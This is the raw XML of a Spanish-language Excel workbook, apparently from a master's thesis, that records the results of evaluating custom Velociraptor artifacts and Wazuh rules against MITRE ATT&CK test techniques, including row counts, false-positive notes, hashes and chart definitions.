    <t>07_Catalogo_Artifacts; 14_Arquitectura_Custom</t>
  </si>
  <si>
    <t>F-0226</t>
  </si>
  <si>
    <t>01_ARTIFACTS\validated\Custom.TFM.HIDS.P2.High.Forensic.Event_v1.yaml</t>
  </si>
  <si>
    <t>2026-06-15T19:23:15.5128993Z</t>
  </si>
  <si>
    <t>F-0227</t>
  </si>
  <si>
    <t>01_ARTIFACTS\validated\Custom.TFM.HIDS.P3.Medium.Behavioral.Event_v1.yaml</t>
  </si>
  <si>
    <t>2026-06-15T19:25:25.4757719Z</t>
  </si>
  <si>
    <t>F-0228</t>
  </si>
  <si>
    <t>01_ARTIFACTS\validated\Custom.TFM.HIDS.P4.Low.Basic_v2.yaml</t>
  </si>
  <si>
    <t>2026-06-09T15:15:05.8211258Z</t>
  </si>
  <si>
    <t>F-0229</t>
  </si>
  <si>
    <t>01_ARTIFACTS\validated\Custom.TFM.HIDS.Router.JSONL.Discord.SOC_v3.yaml</t>
  </si>
  <si>
    <t>2026-06-17T18:31:03.5389364Z</t>
  </si>
  <si>
    <t>F-0230</t>
  </si>
  <si>
    <t>SHA256SUMS_P1_P2_RECALIBRATION.txt</t>
  </si>
  <si>
    <t>01_ARTIFACTS\validated\SHA256SUMS_P1_P2_RECALIBRATION.txt</t>
  </si>
  <si>
    <t>2026-06-18T10:52:35.7860124Z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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2026-06-26T09:07:17.0972897Z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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2026-06-26T09:07:17.0938196Z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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2026-06-26T09:07:17.0982669Z</t>
  </si>
  <si>
    <t>466753B2039230A35A5C472374E2D0AAF2C140FB3B5C6BC6FE4CA4E62528C335</t>
  </si>
  <si>
    <t>F-0236</t>
  </si>
  <si>
    <t>04_EVIDENCE\Excel_visibilidad_26062026\normalized\dataset_summary.json</t>
  </si>
  <si>
    <t>2026-06-26T09:07:17.1051450Z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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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2026-06-26T09:40:12.6081117Z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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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SOURCE_DECLARADA_SIN_FILAS</t>
  </si>
  <si>
    <t>01_ARTIFACTS/validated/Custom.TFM.HIDS.P2.High.Forensic.Event_v1.yaml</t>
  </si>
  <si>
    <t>Forensic_EVENT_Security_ScheduledTask_Optional no generó filas en ALERTAS_VR dentro de la campaña final.</t>
  </si>
  <si>
    <t>No se atribuyen alertas; el artifact principal sigue validado.</t>
  </si>
  <si>
    <t>01_ARTIFACTS/validated/Custom.TFM.HIDS.P3.Medium.Behavioral.Event_v1.yaml</t>
  </si>
  <si>
    <t>TEC009_ZIP_FileCreate_Sysmon_Context no generó filas en ALERTAS_VR dentro de la campaña final.</t>
  </si>
  <si>
    <t>TEC-009 se mantiene detectada por otras sources P1/P3; no se inventa ejecución de esta source.</t>
  </si>
  <si>
    <t>P0_NO_LOCALIZADO</t>
  </si>
  <si>
    <t>01_ARTIFACTS/validated</t>
  </si>
  <si>
    <t>No existe artifact P0 en la carpeta validated.</t>
  </si>
  <si>
    <t>P0 se documenta como no incorporado y no utilizado.</t>
  </si>
  <si>
    <t>EXCEL_HISTORICOS_IDENTICOS</t>
  </si>
  <si>
    <t>04_EVIDENCE/Excel_visibilidad_26062026</t>
  </si>
  <si>
    <t>TFM_VISIBILIDAD...FINAL_26062026.xlsx y Analisis_Tecnicas_TFM_V.5.xlsx son binariamente idénticos (SHA F9CD06E7...).</t>
  </si>
  <si>
    <t>Solo contraste; no se trasladan estados Pendiente ni contenido superado.</t>
  </si>
  <si>
    <t>Wazuh base usa el ruleset nativo; Wazuh custom usa reglas TFM 110xxx. La métrica cuenta técnicas detectadas, no alertas.</t>
  </si>
  <si>
    <t>5 tácticas principales</t>
  </si>
  <si>
    <t>6 con contexto ampliado</t>
  </si>
  <si>
    <t>7 con red contextual</t>
  </si>
  <si>
    <t>379 filas CLIENT_EVENT emitidas/exportadas, incluidas emisiones repetidas; P1=19, P2=118, P3=109 y P4=133; no equivalen a alertas únicas.</t>
  </si>
  <si>
    <t>Runner FP custom; no incluye Hayabusa Monitoring. 82 filas no reconciliadas fueron excluidas y no se computaron como falsos positivos definitivos.</t>
  </si>
  <si>
    <t>Tácticas ATT&amp;CK representadas por el subconjunto evaluado</t>
  </si>
  <si>
    <t>Los cocientes /14 describen tácticas ATT&amp;CK representadas en la clasificación del subconjunto evaluado; no equivalen a las 9 técnicas TEC ejecutadas ni a cobertura general de ATT&amp;CK Enterprise.</t>
  </si>
  <si>
    <t>379 filas CLIENT_EVENT emitidas/exportadas, incluidas emisiones repetidas; el volumen no equivale a alertas únicas ni a cobertura.</t>
  </si>
  <si>
    <t>Distribución de filas CLIENT_EVENT</t>
  </si>
  <si>
    <t>Suma=379 filas emitidas/exportadas, incluidas emisiones repetidas; recuentos obtenidos de ALERTAS_VR.</t>
  </si>
  <si>
    <t>No se mezcla con las cuatro coincidencias High de Hayabusa Monitoring. 82 filas no reconciliadas fueron excluidas y no se computaron como falsos positivos definitivos.</t>
  </si>
  <si>
    <t>Los cocientes /14 corresponden a la clasificación táctica del subconjunto evaluado; no representan cobertura general de ATT&amp;CK Enterprise.</t>
  </si>
  <si>
    <t>Filas CLIENT_EVENT emitidas/exportadas incluidas</t>
  </si>
  <si>
    <t>379 filas CLIENT_EVENT emitidas/exportadas, incluidas emisiones repetidas; no son 379 alertas únicas.</t>
  </si>
  <si>
    <t>filas VR P1</t>
  </si>
  <si>
    <t>filas VR P2</t>
  </si>
  <si>
    <t>filas VR P3</t>
  </si>
  <si>
    <t>filas VR P4</t>
  </si>
  <si>
    <t>summary.json y vr_hits.csv reconciliados. 82 filas no reconciliadas fueron excluidas y no se computaron como falsos positivos definitivos.</t>
  </si>
  <si>
    <t>TotalHits=0. 82 filas no reconciliadas fueron excluidas y no se computaron como falsos positivos definitivos.</t>
  </si>
  <si>
    <t>Resultados finales por perfil. El recuento corresponde a filas CLIENT_EVENT emitidas/exportadas; incluye emisiones repetidas y no equivale a alertas únicas. P2 contiene detección, contexto y evidencia forense y debe interpretarse por source.</t>
  </si>
  <si>
    <t>Filas CLIENT_EVENT</t>
  </si>
  <si>
    <t>Perfil de mayor prioridad observado</t>
  </si>
  <si>
    <t>Incluye señales detectoras, contexto y evidencia forense. No interpretar todas las filas P2 como alertas homogéneas; revisar la source.</t>
  </si>
  <si>
    <t>Filas CLIENT_EVENT emitidas/exportadas · campaña final</t>
  </si>
  <si>
    <t>379 filas CLIENT_EVENT emitidas/exportadas, incluidas emisiones repetidas. TEC_detector/source describe la clasificación inferida por detector/source; TEC_escenario pertenece al ground truth de ejecución y no se reconstruye fila a fila sin evidencia.</t>
  </si>
  <si>
    <t>TEC_detector/source</t>
  </si>
  <si>
    <t>HISTÓRICO — Plan de alertas; no representa el estado final</t>
  </si>
  <si>
    <t>Hoja conservada exclusivamente para trazabilidad histórica. El estado final se documenta en 01_Dashboard, 06_Resumen, RESUMEN_EJECUTIVO, 09_Resultados_Custom, ALERTAS_VR y COMPARACION_VR_WAZUH.</t>
  </si>
  <si>
    <t>Registro histórico; el estado SOC final debe consultarse en las hojas de resultados.</t>
  </si>
  <si>
    <t>Filas/alertas según sistema</t>
  </si>
  <si>
    <t>379 filas CLIENT_EVENT emitidas/exportadas, incluidas emisiones repetidas</t>
  </si>
  <si>
    <t>CLIENT_EVENT_REPETICIONES_EXACTAS</t>
  </si>
  <si>
    <t>ALERTAS_VR</t>
  </si>
  <si>
    <t>182</t>
  </si>
  <si>
    <t>La auditoría documental identificó 182 filas adicionales en grupos de repetición exacta, 177 grupos repetidos y 197 registros distintos al comparar los 15 campos.</t>
  </si>
  <si>
    <t>No afirmar 379 alertas únicas; conservar las filas y documentar las repeticiones.</t>
  </si>
  <si>
    <t>TEC_ESCENARIO_VS_DETECTOR_SOURCE</t>
  </si>
  <si>
    <t>206/379</t>
  </si>
  <si>
    <t>La clasificación TEC derivada del detector/source no coincide necesariamente con el escenario que originó la actividad.</t>
  </si>
  <si>
    <t>Conservar TEC_detector/source y no fabricar TEC_escenario fila a fila.</t>
  </si>
  <si>
    <t>EVIDENCE_ROLE_NO_HOMOGENEO</t>
  </si>
  <si>
    <t>P2 contiene detección, contexto y evidencia forense; las filas no comparten un único rol semántico.</t>
  </si>
  <si>
    <t>Interpretar por source y separar detección, contexto y evidencia en la memoria.</t>
  </si>
  <si>
    <t>POSIBLE_TELEMETRIA_VALIDACION</t>
  </si>
  <si>
    <t>ALERTAS_VR!I383</t>
  </si>
  <si>
    <t>La fila contiene código de validación con -match y puede corresponder a telemetría generada por el propio proceso de validación.</t>
  </si>
  <si>
    <t>Conservarla, señalar la limitación y no usarla como único soporte de cobertura.</t>
  </si>
  <si>
    <t>PLAN_ALERTAS_HISTORICO</t>
  </si>
  <si>
    <t>12_Plan_Alertas</t>
  </si>
  <si>
    <t>HISTÓRICO</t>
  </si>
  <si>
    <t>La hoja conserva un plan previo y no representa por sí sola el estado final.</t>
  </si>
  <si>
    <t>Usar las hojas finales de resultados para métricas y conclusiones.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</si>
</sst>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/14&quot;"/>
    <numFmt numFmtId="165" formatCode="#,#00%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i/>
      <sz val="16"/>
      <color rgb="FF1F4E78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  <font>
      <i/>
      <sz val="10"/>
      <color rgb="FF595959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6"/>
      <color rgb="FFFFFFFF"/>
      <name val="Aptos"/>
      <family val="2"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF595959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i/>
      <sz val="16"/>
      <color rgb="FF595959"/>
      <name val="Aptos"/>
      <family val="2"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Carlito"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="Aptos"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color rgb="FFFFFFFF"/>
      <name val="Aptos"/>
      <family val="2"/>
    </font>
    <font>
      <i/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/>
      <top/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9" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="10" fillId="12" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12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0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="15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12" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="16" fontId="9" fillId="0" borderId="11" xfId="0" quotePrefix="1" applyNumberFormat="1" applyFont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left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="14" borderId="8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0" fontId="16" fillId="14" borderId="2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7" fillId="9" borderId="0" xfId="0" applyFont="1" applyFill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30" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="49" fontId="32" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment vertical="top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49" fontId="35" fillId="15" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="17" fillId="14" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="14" fillId="14" borderId="6" xfId="0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vertical="top"/>
    </xf>
    <xf numFmtId="49" fontId="30" fillId="15" borderId="12" xfId="0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1" fontId="21" fillId="0" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="18" fillId="9" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="165" fontId="18" fillId="9" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill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165" fontId="19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19" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="10" fontId="19" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="22" fillId="10" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="23" fillId="11" borderId="12" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="21" fillId="13" borderId="12" xfId="0" applyNumberFormat="1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49" fontId="21" fillId="0" borderId="12" xfId="0" quotePrefix="1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49" fontId="21" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="12" borderId="1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40" fillId="12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49" fontId="9" fillId="14" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="14" borderId="0" xfId="0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8" fillId="0" borderId="0" xfId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29" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="15" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="17" borderId="0" xfId="0" applyFont="1" applyFill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0" fontId="39" fillId="18" borderId="4" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="18" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="18" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="19" borderId="0" xfId="1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 wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="19" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="18" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="18" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="14" fillId="18" borderId="7" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="19" borderId="9" xfId="1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4" fillId="19" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="18" borderId="4" xfId="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="18" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="19" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="19" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="41" fillId="14" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="39" fillId="18" borderId="0" xfId="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="18" borderId="0" xfId="0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vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="2" borderId="0" xfId="0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5" fillId="3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4" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="16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12" fillId="15" borderId="2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10" fillId="12" borderId="0" xfId="0" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="14" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="17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6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165" formatCode="#,#00%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'01_Dashboard'!$S$29:$S$31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</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'01_Dashboard'!$T$29:$T$31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782-80E4-D2D800E2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tácticas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'01_Dashboard'!$T$10:$T$18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1-4190-9062-9A397579A0FB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Públicos CH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'01_Dashboard'!$U$10:$U$18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1-4190-9062-9A397579A0FB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>Wazuh base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'01_Dashboard'!$V$10:$V$18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E1-4190-9062-9A397579A0FB}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:v>Wazuh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'01_Dashboard'!$W$10:$W$18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1-4190-9062-9A397579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'01_Dashboard'!$S$3:$S$6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'01_Dashboard'!$T$3:$T$6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2DC-9076-B9561E8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Capas acreditadas en CLIENT_EVENT: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'01_Dashboard'!$T$22:$T$24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086-B388-67A2263CA673}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Públicos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'01_Dashboard'!$U$22:$U$24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1-4086-B388-67A2263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Ventana FP por artifact público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en ventana FP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'01_Dashboard'!$T$36:$T$41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7E9-B3C9-2EBDAD88EF92}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>FP CH High/Critical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'01_Dashboard'!$U$36:$U$41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1-47E9-B3C9-2EBDAD88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filas/coincidencias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'01_Dashboard'!$S$45:$S$49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'01_Dashboard'!$T$45:$T$49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C-45CB-AE35-32E353C06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Fuentes de visibilidad host por técnica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Sysmon ID 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GRAFICAS!$B$16:$J$16</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="9"/>
                <c:pt idx="0">
                  <c:v>38</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>214</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>30</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>32</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>10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263-ADF7-88D151919366}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Sysmon ID 3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GRAFICAS!$B$17:$J$17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263-ADF7-88D151919366}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>Sysmon ID 11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GRAFICAS!$B$18:$J$18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E-4263-ADF7-88D151919366}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="3"/>
          <c:order val="3"/>
          <c:tx>
            <c:v>Sysmon ID 12/13/14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GRAFICAS!$B$19:$J$19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8E-4263-ADF7-88D151919366}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="4"/>
          <c:order val="4"/>
          <c:tx>
            <c:v>Sysmon ID 26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GRAFICAS!$B$20:$J$20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E-4263-ADF7-88D151919366}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="5"/>
          <c:order val="5"/>
          <c:tx>
            <c:v>PowerShell 4104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GRAFICAS!$B$21:$J$21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8E-4263-ADF7-88D151919366}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="6"/>
          <c:order val="6"/>
          <c:tx>
            <c:v>System 7045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8E-4263-ADF7-88D15191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 de telemetría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Distribución de alertas CLIENT_EVENT por perfil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 CLIENT_EVENT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GRAFICAS!$I$4:$I$7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GRAFICAS!$J$4:$J$7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B-4712-849D-40CD85B8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Perfil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Pruebas reales custom: TEC 9/9 OK; FP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 TEC (n=9)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GRAFICAS!$M$4:$M$7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CF7-B8F3-34F1E7F31A6D}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Campaña FP (n=10)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GRAFICAS!$N$4:$N$7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8-4CF7-B8F3-34F1E7F3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pruebas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Wazuh base y custom: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Wazuh base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GRAFICAS!$N$16:$N$24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00A-BA27-C5D46EBA5704}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Wazuh custom 110xxx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GRAFICAS!$O$16:$O$24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3-400A-BA27-C5D46EB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Alertas custom observadas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GRAFICAS!$F$4:$F$12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435-BB5F-BB86C0A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 CLIENT_EVENT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129268</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>5443</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>167368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7</xdr:col>
      <xdr:colOff>5443</xdr:colOff>
      <xdr:row>49</xdr:row>
      <xdr:rowOff>59871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5443</xdr:colOff>
      <xdr:row>15</xdr:row>
      <xdr:rowOff>129268</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>14</xdr:col>
      <xdr:colOff>34018</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>167368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5443</xdr:colOff>
      <xdr:row>32</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>14</xdr:col>
      <xdr:colOff>34018</xdr:colOff>
      <xdr:row>49</xdr:row>
      <xdr:rowOff>59871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63954</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>5443</xdr:colOff>
      <xdr:row>66</xdr:row>
      <xdr:rowOff>129268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5444</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>63954</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>14</xdr:col>
      <xdr:colOff>34019</xdr:colOff>
      <xdr:row>66</xdr:row>
      <xdr:rowOff>129268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102028</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>8060</xdr:colOff>
      <xdr:row>52</xdr:row>
      <xdr:rowOff>66859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423313</xdr:colOff>
      <xdr:row>42</xdr:row>
      <xdr:rowOff>161558</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>20</xdr:col>
      <xdr:colOff>440897</xdr:colOff>
      <xdr:row>58</xdr:row>
      <xdr:rowOff>150201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124192</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>8060</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>91953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435219</xdr:colOff>
      <xdr:row>64</xdr:row>
      <xdr:rowOff>124191</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>20</xdr:col>
      <xdr:colOff>452803</xdr:colOff>
      <xdr:row>80</xdr:row>
      <xdr:rowOff>68140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11907</xdr:colOff>
      <xdr:row>71</xdr:row>
      <xdr:rowOff>161192</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>10</xdr:col>
      <xdr:colOff>19967</xdr:colOff>
      <xdr:row>87</xdr:row>
      <xdr:rowOff>126023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 headerRowDxfId="267" dataDxfId="266" totalsRowDxfId="265">
  <tableColumns count="3">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="Bloque" dataDxfId="264"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Qué contiene" dataDxfId="263"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Uso operativo" dataDxfId="2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61" dataDxfId="260" totalsRowDxfId="259">
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0100-000001000000}" name="TEC" dataDxfId="258"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="MITRE_ID" dataDxfId="257"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Técnica MITRE" dataDxfId="256"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0100-000004000000}" name="Táctica principal" dataDxfId="255"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0100-000005000000}" name="Tácticas secundarias/contextuales" dataDxfId="254"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Procedimiento controlado" dataDxfId="253"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0100-000007000000}" name="Evidencia esperada" dataDxfId="252"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0100-000008000000}" name="Artifacts públicos candidatos" dataDxfId="251"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0100-000009000000}" name="Custom esperado" dataDxfId="250"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0100-00000A000000}" name="Notas" dataDxfId="2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248" dataDxfId="247" totalsRowDxfId="246">
  <tableColumns count="15">
    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="ID_Prueba" dataDxfId="245"/>
    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0200-000002000000}" name="ID_Interna" dataDxfId="244"/>
    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="MITRE" dataDxfId="243"/>
    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0200-000004000000}" name="Táctica" dataDxfId="242"/>
    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Escenario_Prueba" dataDxfId="241"/>
    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0200-000006000000}" name="Artifact_Usado" dataDxfId="240"/>
    <tableColumn id="7" xr3:uid="{00000000-0010-0000-0200-000007000000}" name="Tipo_Artifact" dataDxfId="239"/>
    <tableColumn id="8" xr3:uid="{00000000-0010-0000-0200-000008000000}" name="Modo" dataDxfId="238"/>
    <tableColumn id="9" xr3:uid="{00000000-0010-0000-0200-000009000000}" name="Resultado_Detección" dataDxfId="237"/>
    <tableColumn id="10" xr3:uid="{00000000-0010-0000-0200-00000A000000}" name="Ground_Truth" dataDxfId="236"/>
    <tableColumn id="11" xr3:uid="{00000000-0010-0000-0200-00000B000000}" name="Fuente_Evidencia" dataDxfId="235"/>
    <tableColumn id="12" xr3:uid="{00000000-0010-0000-0200-00000C000000}" name="Evidencia_Host_Observada" dataDxfId="234"/>
    <tableColumn id="13" xr3:uid="{00000000-0010-0000-0200-00000D000000}" name="Discord" dataDxfId="233"/>
